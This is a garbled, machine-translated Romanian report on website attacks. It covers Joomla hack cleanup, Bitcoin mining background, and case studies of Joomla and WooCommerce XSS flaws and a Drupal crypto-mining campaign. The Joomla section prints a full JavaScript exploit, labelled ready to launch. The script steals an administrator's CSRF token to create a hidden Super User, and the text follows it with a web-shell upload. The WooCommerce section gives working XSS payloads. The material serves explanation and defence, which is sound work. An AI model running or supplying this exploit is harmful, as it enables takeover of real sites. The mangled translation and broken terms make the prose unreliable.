Poate provoca o adev arat a dezordine ^ n dvs. instalare. S-ar putea s a avet ,i nevoie de o
instalare proasp at a. Pentru a evita toate acestea, asigurat ,i-v a c a p astrat ,i ^ ntotdeauna
de rezerv a. ^In timp ce analiz am s ,ierele dup a un Joomla Hack, comanda di vine la
^ ndem^ an a. Aceasta ajut a la vericarea s ,ierelor modicate. Toate s ,ierele Joomla sunt
disponibile public pe Github. Acest lucru poate folosit pentru comparat ,ie. Pentru a
verica integritatea s ,ierului de baz a cu comenzi SSH:
$ mkdir joomla $ cd joomla
%^In primul r^ and, am creat un director numit joomla s ,i am trecut la asta.
$ wget https://github.com/joomla/joomla-cms/releases/download/3.6.4/
Joomla_3.6.4-Stabil-Full_Package.tar.gz
$ tar -zxvf Joomla_3.6.4-Stable-Full_Package.tar.gz
%Comanda wget a desc arcat fis ,ierele Joomla de la GitHub.
A doua linie de cod apoi le extrage.
$ diff -r joomla-3.6.4 ./public_html
%^In sf^ ars ,it, comanda dif este aici compar^ and cont ,inutul.
%De data aceasta ne uit am la fis ,ierul
%public_html. ^In mod similar, putet ,i verifica mai multe fis ,iere.
%Mai mult,fis ,ierele pot fi verificate manual. Trebuie doar s a v a
%conectat ,i utiliz^ and orice client FTP
%s,i s a verificat ,i fis ,ierele. SSH v a permite s a listat ,i modific arile
%fis ,ierelor.
$ find ./ -type f -mtime -15
Aici, aceast a comand a SSH dezv aluie s ,ierele modicate ^ n ultimele 15 zile. ^In mod
similar, voi poate schimba marcajul de timp. Fii atent la orice s ,iere modicate recent.
Consultat ,i expert ,ii de securitate Astra acum pentru a g asi s ,i a repara un hacker Joomla.
Paravanul nostru puternic v a protejeaz a site-ul de la XSS, LFI, RFI, SQL Injection, Bad
Boots, Scanner Vulnerabilitate automata.
12
3.7.5 Fixarea Joomla Hack: Vericat ,i jurnalele utilizatorilor
Jurnalele de sistem sunt cel mai bun instrument pentru a identica cauza unei hack-uri
Joomla. ^Inregistreaz a jurnalele de system toate activit at ,ile anterioare care au avut loc.
Deci, ori de c^ ate ori are loc o inject ,ie XSS sau SQL, exist a ^ ntotdeauna o ^ nregistrare a
cererii. ^In plus, hackerii au tendint ,a de a crea noi administrator conturi. Dac a dorit ,i s a
vericat ,i utilizatorii suspectat ,i, atunci:
Dac a vedet ,i c a utilizatorii se logheaz a de la IP-uri necunoscute, eliminat ,i-le. Mai mult,
folosit ,i raportul de diagnostic Google pentru a g asi cauza. V a ofer a o viziune cuprinz atoare
de pe site-ul dvs. Dac a site-ul dvs. este pe lista neagr a, lucrat ,i mai aproape de Google.
Raportul de diagnostic va da tu caut ,i lista neagr a. Utilizat ,i-l pentru a g asi s ,i elimina
infect ,ia!
3.7.6 Fixarea Joomla Hack: Actualizare
De cele mai multe ori, o hacking Joomla are loc din cauza s ,ierelor necorespunz atoare.
Asigurat ,i-v a c a toate modulele dvs. sunt actualizate. De asemenea, asigurat ,i-v a c a
software-ul server este actualizat. Pornit ,i mereu Actualiz arile automate. Este posibil
ca sunetul s a consume resurse, dar este o practic a sigur a. Problemele legate de securita-
tea Joomla v a pot ment ,ine ocupat ,i. Deci, dac a v a este greu s a cur at ,at,i hack-ul Joomla,
consultat ,i expert ,ii.
4 Bitcoin Mining
4.1 Introducere
Bitcoin este o criptocurrency, o form a de numerar electronic.
Este o moned a digital a descentralizat a, f ar a o banc a central a sau
un singur administrator, care poate trimis a de la utilizator la
utilizator ^ n ret ,eaua Bitcoin peer-to-peer f ar a a nevoie de inter-
mediari.
Tranzact ,iile sunt vericate de noduri de ret ,ea prin criptograe
s,i^ nregistrate^ ntr-un registru public distribuit numit bloc de bloc.
Bitcoin a fost inventat de o persoan a necunoscut a sau de un grup
de oameni care folosea numele Satoshi Nakamoto s ,i a fost lansat
ca software open source ^ n 2009. Bitcoinurile sunt create ca o
recompens a pentru un proces cunoscut sub numele de minerit. Acestea pot schimbate
pentru alte valute, produse s ,i servicii. Cercetarea produs a de Universitatea din Cambridge
estimeaz a c a ^ n 2017 au existat 2,9 p^ an a la 5,8 milioane de utilizatori unici care utilizeaz a
un portofel de tip criptocurrency, cei mai mult ,i folosindu-se bitcoin.
Bitcoin a fost criticat pentru utilizarea sa ^ n tranzact ,iile ilegale, consumul ridicat de
energie electric a, volatilitatea pret ,urilor, furturile din schimburi, s ,i de economis ,tii renumit ,i
care sust ,in c a "ar trebui s a aib a un pret ,zero". Bitcoin a fost, de asemenea, folosit ca
o investit ,ie, des ,i mai multe agent ,ii de reglementare au emis alerte de investitori despre
Bitcoin.
4.2 Creat ie
Numele de domeniu "bitcoin.org" a fost ^ nregistrat la 18 august 2008. La 31 octombrie
2008, un link c atre o lucrare scris a de Satoshi Nakamoto intitulat a Bitcoin: Un sistem
13
electronic de numerar de tip Peer-to-Peer a fost postat pe o list a de corespondent , a crip-
tograc a. Nakamoto a implementat software-ul bitcoin ca un cod open-source s ,i la lansat
^ n ianuarie 2009. Identitatea lui Nakamoto r am^ ane necunoscut a.
La 3 ianuarie 2009, ret ,eaua Bitcoin a fost creat a atunci c^ and Nakamoto a exploatat
primul bloc al lant ,ului, cunoscut sub numele de bloc de genez a. Embedded ^ n colajul
acestei blocuri a fost textul "The Times 03 / Jan / 2009 Cancelar la un pas de al doilea
salvare pentru b anci". Aceast a not a se refer a la un titlu publicat de The Times s ,i a fost
interpretat at^ at ca o amprent a de timp, c^ at s ,i ca un comentariu privind instabilitatea
cauzat a de sectorul bancar cu rezerve fract ,ionare.
Receptorul primei tranzact ,ii bitcoin a fost cypherpunk Hal Finney, care a creat primul
sistem de vericare a funct ,ion arii reutilizabile (RPoW) ^ n 2004. [24] Finney a desc arcat
software-ul bitcoin la data lans arii sale s ,i la 12 ianuarie 2009 a primit zece biti din Naka-
moto. Alt ,i suporteri timpurii ai lui cypherpunk au fost creatorii unor predecesori bitcoin:
Wei Dai, creatorul de b-bani, s ,i Nick Szabo, creatorul de aur bit ,i.^In 2010, prima tranzact ,ie
comercial a cunoscut a folosind bitcoin a ap arut atunci c^ and programatorul Laszlo Hanyecz
a cump arat dou a pizza de Papa John pentru 10,000.
Analis ,tii Blockchain estimeaz a c a Nakamoto a exploatat aproximativ un milion de
bitcoins [28] ^ nainte de a disp area ^ n 2010, c^ and a predat cheia de alert a a ret ,elei s ,i
a controlat depozitul de coduri c atre Gavin Andresen. Andresen a devenit mai t^ arziu
dezvoltator principal la Fundat ,ia Bitcoin. Andresen a c autat atunci s a descentralizeze
controlul. Aceast a oportunitate de st^ anga pentru controversa de a se dezvolta pe parcursul
viitoarei dezvolt ari a bitcoinului, spre deosebire de autoritatea perceput a a contribut ,iilor
lui Nakamoto.
4.3 Blockchain
Blocul de bit ,i bitcoin (Blockchain) este un registru public care^ nregistreaz a tranzact ,iile
bitcoin. Acesta este implementat ca un lant ,de blocuri, ecare bloc care cont ,ine un
hash din blocul anterior p^ an a la blocul de genez a [c] al lant ,ului. O ret ,ea de noduri de
comunicat ,ie care ruleaz a software bitcoin ment ,ine blocul de blocuri. 215-219 Tranzact ,iile
pl atitorului de formula X trimit bit ,i bitului Y c atre beneciarul pl at ,ii Z sunt difuzate ^ n
aceast a ret ,ea utiliz^ and aplicat ,ii software disponibile.
Nodurile de ret ,ea pot valida tranzact ,iile, le pot ad auga ^ n copia c art ,ii s ,i apoi le pot
difuza pe alte noduri. Pentru a realiza vericarea independent a a lant ,ului de proprietate,
ecare nod de ret ,ea stocheaz a propria copie a blocului. La ecare 10 minute, se creeaz a un
nou grup de tranzact ,ii acceptate, numit bloc, care se adaug a blocului s ,i se public a rapid la
toate nodurile, f ar a a necesita o supraveghere central a. Acest lucru permite software-ului
bitcoin s a determine c^ and a fost cheltuit un anumit bitcoin, ceea ce este necesar pentru
a preveni dublarea cheltuielilor. Un registru convent ,ional ^ nregistreaz a transferurile de
facturi sau bilete la ordin care exist a ^ n afar a de acesta, dar blocul de blocuri este singurul
loc ^ n care pot spuse c a existent ,a bitcoinelor exist a sub form a de rezultate necheltuite
ale tranzact ,iilor.
4.4 Mineritul Bitcoin
Mineritul este un serviciu de p astrare a ^ nregistr arilor realizat prin utilizarea puterii de
procesare a calculatorului. [Minerii] p astreaz a blocul consistent, complet s ,i nemodicabil
prin gruparea repetat a a tranzact ,iilor de emisie ^ ntr-un bloc, care este apoi transmis c atre
ret ,ea s ,i vericat de c atre destinatar noduri. Fiecare bloc cont ,ine o hash criptograc a
SHA-256 a blocului precedent, leg^ and-o astfel de blocul anterior s ,i d^ and blocului numele
14
s au.
Pentru a acceptat de restul ret ,elei, un nou bloc trebuie s a cont ,in a o dovad a a muncii
(PoW). Sistemul utilizat se bazeaz a pe programul anti-spam al lui Adam Back, 1997,
Hashcash. PoW cere minerilor s a g aseasc a un num ar numit un nonce, astfel ^ nc^ at atunci
c^ and cont ,inutul blocului este s ,ters ^ mpreun a cu nonce, rezultatul este numeric mai mic
dec^ at t ,inta de dicultate a ret ,elei. Aceast a dovad a este us ,or pentru orice nod din ret ,ea
pentru a verica, dar este extrem de consumatoare de timp pentru a genera, ca pentru un
hash criptograc securizat, minerii trebuie s a ^ ncerce mai multe valori diferite de nonce
(de obicei, succesiunea valorilor testate este numerele naturale ascendente: 0, 1, 2, 3, …
^ nainte de a ^ ndeplini obiectivul de dicultate.
La ecare 2016 blocuri (aproximativ 14 zile la aproximativ 10 minute pe bloc), obiec-
tivul de dicultate este ajustat ^ n funct ,ie de performant ,a recent a a ret ,elei, cu scopul de
a ment ,ine timpul mediu ^ ntre blocurile noi la zece minute. ^In acest fel, sistemul se adap-
teaz a automat la cantitatea total a de energie minier a din ret ,ea.^Intre 1 martie 2014 s ,i
1 martie 2015, num arul mediu de persoane care nu au f acut minuni a trebuit s a ^ ncerce
^ nainte de a crea un nou bloc crescut de la 16,4 chintilion la 200,5 quintillion.
Sistemul de vericare a muncii, al aturi de ^ nl ant ,uirea blocurilor, face ca modic arile
blocului s a e extrem de greu, deoarece un atacator trebuie s a modice toate blocurile
ulterioare pentru ca modic arile unui bloc s a e acceptate. Deoarece blocurile noi sunt
minate tot timpul, dicultatea modic arii unui bloc cres ,te odat a cu trecerea timpului, iar
num arul blocurilor ulterioare (numite s ,i conrm ari ale blocului dat) cres ,te.
15
5 Aplicat ie
5.1 Vulnerabilitate Joomla!
5.1.1 Joomla Hack
Joomla! este una dintre cele mai populare sisteme de management al cont inutului
din lume (CMS). Acesta permite utilizatorilor sa creeze site-uri web si aplicat ii online
puternice. Mai mult de 3 la suta din site-uri Web execut a Joomla!, si reprezint a mai
mult de 9 la suta din cota de piat a CMS. Din iulie 2017, Joomla! a fost descarcat de
peste 82 de milioane de ori. Peste 7.800 extensii gratuite si comerciale sunt disponibile de
ocial Joomla! Extensia Directory, si mai sunt disponibile din alte surse. Am descoperit 2
Cross-Site Scripting (XSS) vulnerabilitat i ^ n Joomla!. Acestea sunt identicate ca CVE-
2017-7985 si CVE-2017-7,986. Dup a analizarea patch-urilor pentru aceste probleme, am
descoperit mai multe vulnerabilitati XSS. Joomla! identic a ^ n continuare aceste vulne-
rabilit at i noi ca CVE-2017-7985, si a postat un anunt de securitate separat. A sa cum
este detaliat, aceste vulnerabilit at i exist a, deoarece Joomla! nu reu se ste sa dezinfecteze
datele introduse de utilizatorul r au intent ionat, atunci c^ and utilizatorii posteaz a sau edi-
teaz a un articol. Atacatorii la distant a ar putea exploata aceste vulnerabilit at i pentru a
rula cod malit ios pe browser-ul victimei. Acest lucru ar putea permite atacatorului de la
distant a de a obt ine controlul Joomla!al contului victimei. Cu toate acestea, ^ n cazul ^ n
care victima are permisiunea mai mare, cum ar administrator de sistem, atacatorul de
la distant a ar putea obt ine de fapt, un control complet al serverului web. Aceste vulne-
rabilit at i afecteaza Joomla!, mai exact Versiunile CMS 1.5.0 prin 3.7.2.
5.1.2 Context
^In patch-uri pentru CVE-2017-7985 si CVE-2017-7986, Joomla! det ine caractere l-
trate special, cum ar Ghilimele duble dreapta, si coduri HTML vulnerabile, cum ar
"formaction.\ Dar procesul de ltrare este similar cu o list a neagr a Sanitizer, ceea ce
^ nseamna c a se potrive ste pur si simplu cu codurile hack si site-ul poate i atacat.
5.1.3 Analiz a
^In aceasta analiz a am folosit un cont de test"yzy1\. Acest cont are doar permisiunea
editorului, ceea ce ^ nseamna ca nu este permis sa utilizeze elemente HTML complete ^ n
patch-urile Joomla! CVE-2017-7985 si CVE-2017-7986
Precum observ am in gura 1 si gura 2
16
Figura 1: Fix pentru update-ul CVE-2017-7985
Figura 2: Fix pentru CVE-2017-7986
Pentru ca e un ltru de list a neagra XSS, am constatat c a, prin ad augarea"% 0A%
0min\ marca HTML, un atacator poate s a ocoleasca ltrul si insereaz a coduri HTML
17
arbitrare. De exemplu, POC4^ n CVE-2017-7985 poate schimbat. Am adaugat 0A%
0min% ^ n spatele Ghilimelelelor duble dreapta, ceea ce a permis codul XSS sa e declan sat
at^ at pe prima pagina si backend, a sa cum este prezentat ^ n gurile 3, 4 si 5. Pentru CVE-
2017-7986 poate s a e aplicat acela si mod.
Figura 3: Introducerea noului PoC pentru CVE-2017-7985
4Proof of Concept
18
Figura 4: Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n prima pagin a
Figura 5: Noul PoC pentru CVE-2017-7985 a fost declans ,at ^ n pagina de
administrator
19
Figura 6: Atacul codurilor HTML folosind \%0d%0a"
Bazat pe acest lucru, am g asit o modalitate mai u soara de a declan sa atacul XSS prin
simpla ad augare a"% 0min% 0A\ sir pentru tag-uri HTML arbitrare, cum ar un SVG,
img, si a sa mai departe. Aici este un exemplu cu o eticheta SVG5.
Figura 7: Inserare PoC ^ n tag-ul SVG
Codurile vor declan sate at^ at pe prima pagin a, dar si pagina de administrator, a sa
cum este prezentat ^ n gurile 8 si 9.
5Scalable Vector Graphics
20
Figura 8: SVG tag XSS ^ n prima pagin a
Figura 9: SVG tag XSS ^ n pagina de administrator
21
5.1.4 Exploit
//Exploit code ready to launch
1 var request = new XMLHttpRequest();
2
3 var req = new XMLHttpRequest();
4
5 var id = '';
6
7 var boundary = Math.random().toString().substr(2);
8
9 var space = "–––––––";
10
11 request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true);
12
13 request.onload = function() {
14
15 if (request.status >= 200 && request.status < 400) {
16
17 var resp = request.responseText;
18
19 var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
20
21 id = myRegex.exec(resp)[1];
22
23 req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true);
24
25 req.setRequestHeader("content-type", "multipart/form-data; boundary=–––––––––" + boundary);
26
27 var multipart = space + boundary +
28
29 "\r\nContent-Disposition: form-data; name=\"jform[name]\"" +
30
31 "\r\n\r\nFortinet Yzy\r\n" +
32
33 space + boundary +
34
35 "\r\nContent-Disposition: form-data; name=\"jform[username]\"" +
36
37 "\r\n\r\nfortinetyzy\r\n" +
38
39 space + boundary +
40
41 "\r\nContent-Disposition: form-data; name=\"jform[password]\"" +
42 "\r\n\r\nfortinet\r\n" +
43
44 space + boundary +
45
46 "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" +
22
47
48 "\r\n\r\nfortinet\r\n" +
49
50 space + boundary +
51
52 "\r\nContent-Disposition: form-data; name=\"jform[email]\"" +
53
54 "\r\n\r\nzyyang@fortinet.com\r\n" +
55
56 space + boundary +
57
58 "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" +
59
60 "\r\n\r\n\r\n" +
61
62 space + boundary +
63
64 "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" +
65
66 "\r\n\r\n\r\n" +
67
68 space + boundary +
69
70 "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" +
71
72 "\r\n\r\n\r\n" +
73
74 space + boundary +
75
76 "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" +
77
78 "\r\n\r\n0\r\n" +
79
80 space + boundary +
81
82 "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" +
83
84 "\r\n\r\n0\r\n" +
85
86 space + boundary +
87
88 "\r\nContent-Disposition: form-data; name=\"jform[block]\"" +
89
90 "\r\n\r\n0\r\n" +
91
92 space + boundary +
93
94 "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" +
95
96 "\r\n\r\n0\r\n" +
23
97
98 space + boundary +
99
100 "\r\nContent-Disposition: form-data; name=\"jform[id]\"" +
101
102 "\r\n\r\n0\r\n" +
103
104 space + boundary +
105
106 "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" +
107
108 "\r\n\r\n8\r\n" +
109
110 space + boundary +
111
112 "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" +
113
114 "\r\n\r\n\r\n" +
115
116 space + boundary +
117
118 "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" +
119
120 "\r\n\r\n\r\n" +
121
122 space + boundary +
123
124 "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" +
125
126 "\r\n\r\n\r\n" +
127
128 space + boundary +
129
130 "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" +
131
132 "\r\n\r\n\r\n" +
133
134 space + boundary +
135
136 "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" +
137
138 "\r\n\r\n\r\n" +
139
140 space + boundary +
141
142 "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" +
143
144 "\r\n\r\n\r\n" +
145
146 space + boundary +
24
147
148 "\r\nContent-Disposition: form-data; name=\"task\"" +
149
150 "\r\n\r\nuser.apply\r\n" +
151
152 space + boundary +
153
154 "\r\nContent-Disposition: form-data; name=\"" + id + "\"" +
155
156 "\r\n\r\n1\r\n" +
157
158 space + boundary + "–\r\n";
159
160 req.onload = function() {
161
162 if (req.status >= 200 && req.status < 400) {
163
164 var resp = req.responseText;
165
166 console.log(resp);
167
168 }
169
170 };
171
172 req.send(multipart);
173
174 }
175
176 };
177
178
179
180 request.send();
181 //Injection succesfully complete.
25
Ar at am acum cum un atacator folosind un cont scazut permisiuni este ^ n m asura s a
exploateze aceasta vulnerabilitate pentru a crea un cont Super utilizator. Pentru a realiza
acest lucru, voi construi mai ^ nt^ ai un mic JavaScript pentru a adauga un Super utilizator.
Acest script folose ste permisiunea administratorului site-ului pentru a obt ine indicativul
CSRF6de utilizator ^ n pagina de editare"index.php? Option = com users & vizualizare
= user & aspect = editare\, apoi posteaza "add Super" la cererea utilizatorului la server
folosind token-ul CSRF. ^In acest exemplu, noul utilizator Super este Fortinet YZY si
parola este Fortinet.
Un atacator poate adauga acest cod la Joomla! prin exploatarea vulnerabilit at ii XSS, a sa
cum se arata ^ n gura 10.
Figura 10: Ad augarea codului XSS
Dup a ce administratorul site-ului vede articolul ^ n pagina de administrator, este creat
imediat un cont Super User. A se vedea gurile 11 si 12.
6Cross-Site Request Forgery
26
Figura 11: Administratorul site-ului declan seaz a atacul XSS ^ n pagina de
administrator
Figura 12: Un nou SuperUser ad augat de atacator
Atacatorul acum se poate conecta la Joomla! cu permisiunea utilizatorului SuperU-
SER si ^ ncarc a un sier web prin instalarea unui plugin. Acest lucru este prezentat ^ n
gurile 13 si 14.
27
Figura 13: ^Incarcarea unui shell web folosind Super contul de utilizator al
atacatorului
Figura 14: Atacatorul este capabil de a accesa shell-ul web si execut a comenzi
28
5.1.5 Solutie
Tot i userii platformei Joomla! trebuie sa fac a upgrade la ultima versiune cat mai
urgent!
^In plus, organizat ,iile care utilizeaz a solut ,iile Fortinet IPS sunt deja protejate^ mpotriva
acestor vulnerabilit at ,i cu urm atoarele semn aturi:
Joomla!.Core.create-a-post.XSS
Joomla!.Core.LineFeed.Char.XSS.A
Joomla!.Core.LineFeed.Char.XSS.B
29
5.2 Vulnerabilitate WordPress WooCommerce XSS { Hack asu-
pra unui cont de client cu o imagine
Aceast a vulnerabilitate XSS (CVE-2019-9168) exist a ^ n as ,ajul zoom al funct ,iei Pho-
toswipe, unde WooCommerce nu a reus ,it s a sterilizeze datele titlului s ,i imaginilor unei
imagini. Aceast a vulnerabilitate poate permite unui atacator s a injecteze codul arbitrar
^ ntr-un site web alimentat de WooCommerce. Atunci c^ and o victim a acceseaz a pagina
web cu codul de atac introdus, atacatorul ar putea s a obt ,in a controlul asupra browseru-
lui victimei, s a init ieze sesiunea curent a WooCommerce, s a adune informat ,ii protejate, etc.
Aceast a vulnerabilitate XSS afecteaz a versiunile WooCommerce ^ nainte de 3.5.4.
Echipa WooCommerce a emis un nou patch software. Din rezumat, vedem c a remedierea
WooCommerce acum securizeaz a datele titlului s ,i legenda.
Figura 15: Patch CVE-2019-9168
Analiz a
Pentru a reproduce aceast a vulnerabilitate, primul pas este ^ nc arcarea unei imagini s ,i
introducerea codului JavaScript ^ n c^ ampul Imagine a imaginii. ^In WordPress, ^ nc arcarea
unei imagini ^ ntr-un cont cu permisiuni reduse nu necesit a permisiunea de a accesa plug-
in-ul WooCommerce.
30
Figura 16: Upload imagine
Deoarece numai conturile cu permisiuni ridicate precum admin pot ad auga cod Ja-
vaScript arbitrar, vom introduce codul securizat
"<img src=1 onerror=prompt('1')\>"
(not a: elimin am citatele duble de la ^ nceput si sf^ ar sit) folosind un cont cu permisiuni
redus(user obi snuit).
31
Figura 17: Injectare cod XSS
Apoi, odat a ce cineva cu privilegii si permisiuni reduse adaug a aceast a imagine in-
fectat a ca imagine a produselor sau ^ ntr-o galerie de produse, codul XSS este inserat ^ n
pagina produsului.
Figura 18: Imaginea compromisa uploadat a in pagina de Produse
Acum, c^ and o victim a vizualizeaz a acest produs s ,i m are ste imaginea produsului, codul
32
XSS va executat automat. Detaliat ^ n gurile 19 s ,i 20.
Figura 19: Zoom pe imaginea produsului
Figura 20: Declan sarea atacului XSS
Pentru a simplica procesul de atac, un atacator ar putea modica titlul s ,i subiectul
unei imagini local, schimb^ andu-le ^ n
33
"<img src=1 onerror=prompt('2')>"
(not a: elimin am citatele duble).
Figura 21: Crearea s ,ierului PoC la nivel local
Atacatorul poate apoi s a ^ mp art as ,easc a aceast a imagine administratorului site-ului.
Atunci c^ and managerul foloses ,te aceast a imagine ca imagine a produsului sau ^ n galeria
de produse, codul XSS va inserat.
34
Figura 22: Managerul de site utilizeaz a s ,ierul PoC ca imagine a produsului
Figura 23: Declan sarea atacului XSS
Un atacator ar putea exploata aceast a vulnerabilitate pentru a ataca sesiunea curent a
a utilizatorului, pentru a controla browserul victimei s ,i multe altele. Deoarece obiectivele
sunt site-uri web de eCommerce, atacatorul ar putea apoi s a colecteze date delicate pre-
cum informat ,ii bancare, adrese etc.
Solut ie
35
Tot ,i utilizatorii versiunilor vulnerabile ale WooCommerce sunt ^ ncurajat ,i s a treac a ime-
diat la ultima versiune. ^In plus, organizat ,iile care au implementat solut ,ii Fortinet IPS
sunt deja protejate de aceast a vulnerabilitate cu urm atoarea semn atur a:
WooCommerce.Photoswipe.Caption.XSS
5.3 Vulnerabilitatea Drupal (CVE-2018-7602) a fost exploatat a
pentru a furniza malware de tip "Monero-Mining"
Am reus ,it s a observ am o serie de atacuri de ret ,ea care ex-
ploateaz a CVE-2018-7602, un defect de securitate ^ n cadrul de
gestionare a cont ,inutului Drupal. Deocamdat a, aceste atacuri vi-
zeaz a transformarea sistemelor afectate ^ n robot ,i de exploatare
Monero. De remarcat sunt c aile sale de a se ascunde ^ n spatele
ret ,elei Tor pentru a evita detectarea s ,i cum veric a mai ^ nt^ ai sis-
temul afectat ^ nainte de ao infecta cu un program malware de tip
cryptocurrency-mining. ^In timp ce aceste atacuri duc ^ n prezent
la furtul de resurse s ,i la malware-ul care ^ ncetines ,te performant ,a
sistemului, vulnerabilitatea poate utilizat a ca o us , a pentru alte
amenint , ari.
Ce este CVE-2018-7602?
CVE-2018-7602 este o vulnerabilitate la execut ,ia codului la distant , a (RCE) care afec-
teaz a versiunile 7 s ,i 8 ale Drupal, care a fost patch-uri pe 25 aprilie 2018. Defect ,iunea
de securitate a fost descoperit a dup a ce echipa de securitate a Drupal a examinat o alt a
vulnerabilitate, CVE-2018-7600 de asemenea, cunoscut sub numele de Drupalgeddon 2,
patch-uri pe 28 martie 2018). Echipa de securitate a echipei Drupal a raportat, de ase-
menea, c a CVE-2018-7602 este exploatat a ^ n mod activ ^ n s alb aticie. Conform analizei
tehnice a unui cercet ator, exploatarea cu succes a vulnerabilit at ,ii presupune ridicarea per-
misiunii de a modica sau s ,terge cont ,inutul unui site web executat de Drupal.
Cum duce Exploit-ul la minerul Monero?
As ,a cum se arat a ^ n gurile 24 s ,i 25, atacurile pe care le-am v azut exploat^ and CVE-
2018-7602 descarc a un script shell, care va prelua apoi un downloader ELF (Executable
and Linkable Format) (detectat de Trend Micro ca ELF DLOADR.DHG). Dup a cum se
arat a ^ n Figura 26, desc arc atorul va ad auga o intrare crontab (care, ^ n sistemele bazate pe
Unix, cont ,ine comenzi pentru a executate) pentru a se actualiza automat. ^In acest caz,
comanda este de a verica leg atura de la care se descarc a s ,i interpreteaz a un script numit
up.jpg prezent^ and ca s ,ier JPEG. Desc arc atorul bazat pe ELF recupereaz a, de asemenea,
un program malware de tip Minero (COINMINER TOOLXMR.O-ELF64) s ,i ^ l instaleaz a
pe mas ,ina afectat a.
36
Figura 24: Fragment de cod care arat a modul ^ n care CVE-2018-7602 este
exploatat a
Figura 25: Fragment de cod care arat a modul ^ n care este recuperat scriptul shell
Figura 26: O intrare crontab ad augat a de malware pentru a se actualiza automat
Ce face aceste atacuri notabile?
Downloader-ul foloses ,te metoda HTTP 1.0 POST pentru a trimite date ^ napoi ^ n funct ,ia
SEND DATA (). Calea t ,int a pentru metoda POST este /drupal/df.php. Tracul HTTP
1.0 este destul de neobis ,nuit ^ n aceste tipuri de atacuri, deoarece majoritatea tracului
HTTP de c atre multe organizat ,ii este deja ^ n HTTP 1.1 sau o versiune ulterioar a. S ,i
av^ and ^ n vedere aceast a variant , a aparent a, anticip am acest lucru ca un model ^ n viitoa-
rele atacuri.
37
Figura 27: Codurile de asamblare ale funct ,iei SEND DATA a downloader-ului
Minerul Monero instalat ^ n mas ,in a este XMRig7cu surs a deschis a (versiunea 2.6.3).
De asemenea, veric a dac a mas ,ina trebuie compromis a sau nu. C^ and minerul ^ ncepe s a
ruleze, acesta ^ s ,i schimb a numele procesului ^ n
[^ $ I $ ^]
s,i acceseaz a s ,ierul /tmp/dvir.pid. Figura 27 prezint a acest comportament furios, pe care
atacatorul / operatorul la ad augat ^ n versiunea lor modicat a de XMRig. Acesta este un
steag ros ,u pe care administratorii sau profesionis ,tii ^ n domeniul securit at ,ii informat ,iilor
^ l pot lua ^ n considerare pentru a discerne activit at ,ile r au-intent ,ionate, cum ar im-
plementarea sistemelor de detectare s ,i prevenire a intruziunilor bazate pe gazd a sau a
criminalit at ,ii performante.
7XMRig-Miner Trojan
38
Figura 28: O parte din XMRig inclus a ^ n malware-ul de tip minerit de criptograe
39
Figura 29: Pseudo-codurile inversate ale funct ,iei principale () a lui Monero-miner
De unde provin atacurile?
Atacurile sunt notabile pentru m asurile de precaut ,ie pe care le-au luat prin faptul c a se
ascund ^ n spatele ret ,elei Tor. Am reus ,it s a urm am urm arirea malware-ului la 197 [.] 231
[.] 221 [.] 211. Pe baza informat ,iilor despre WhoIs, segmentul IP 197 [.] 231 [.] 221
[.] 0 [/] 24 pare s a apart ,in a unui furnizor de ret ,ea privat a virtual a (VPN). ^In plus, am
constatat c a adresa IP este un nod de ies ,ire Tor – gateway-uri de unde tracul criptat Tor
este transmis tracului normal de internet.
De fapt, Trend Micro8blocat 810 atacuri din ultima lun a provenind de la aceast a
adres a IP. Av^ and ^ n vedere c a este un nod de ies ,ire Tor, nu suntem siguri dac a aceste
atacuri sunt legate de ^ nc arc atura utilizat a de mineritul Monero sau provin de la un singur
actor de amenint ,are. Majoritatea atacurilor de la aceast a adres a IP exploateaz a Hear-
tbleed (CVE-2014-0160). Celelalte atacuri pe care le-am observat au fost exploatate Shell-
Shock (CVE-2014-6271), o vulnerabilitate de dezv aluire a informat ,iilor ^ n WEB GoAhead
(CVE-2017-5674) s ,i o eroare de scurgere de memorie ^ n Apache (CVE-2004-0113). Trend
Micro a blocat, de asemenea, conect arile de fort , a brute-force File Transfer Protocol (FTP)
s,i Secure Shell (SSH) de la aceast a adres a IP. Ret ,inet ,i c a aceste atacuri exploateaz a chiar
s,i vulnerabilit at ,i bazate pe Linux sau Unix, subliniind important ,a ap ar arii ^ n profunzime.
Acest lucru este valabil ^ n special pentru ^ ntreprinderile ale c aror aplicat ,ii web s ,i site-uri
– cum ar cele care utilizeaz a Drupal – gestioneaz a date s ,i tranzact ,ii sensibile. Chiar s ,i
un defect de securitate dat^ and ^ nc a din 2014 poate folosit ca punct de intrare pentru
atacatori.
8Enterprise Cybersecurity Solutions
40
Figura 30: TOR informat ,ii nod de ies ,ire (2018/06/16) pentru 197 [.] 231 [.] 221 [.]
211
Protect ie ^ mpotriva acestei amenint , ari
Patching s ,i actualizarea nucleului Drupal stabiles ,te vulnerabilitatea pe care aceast a amenint ,are
o exploateaz a. Buletinul de securitate al Drupal ofer a ^ ndrum ari privind remedierea
vulnerabilit at ,ii, ^ n special pentru cei care ^ nc a folosesc versiuni nefolosite ale Drupal.
Dezvoltatorii, precum s ,i administratorii de sisteme s ,i profesionis ,tii din domeniul secu-
rit at ,ii informat ,iilor ar trebui, de asemenea, s a practice securitatea prin design: securizarea
aplicat ,iilor din care sunt stocate s ,i gestionate date personale s ,i corporative, asigur^ and, de
asemenea, us ,urint ,a ^ n utilizare s ,i funct ,ionalitate.
O vulnerabilitate unic a^ ntr-un site web sau^ ntr-o aplicat ,ie ar putea provoca o^ nc alcare
sau o ^ ntrerupere a datelor. Organizat ,iile pot s a atent ,ioneze ^ n continuare amenint , arile de
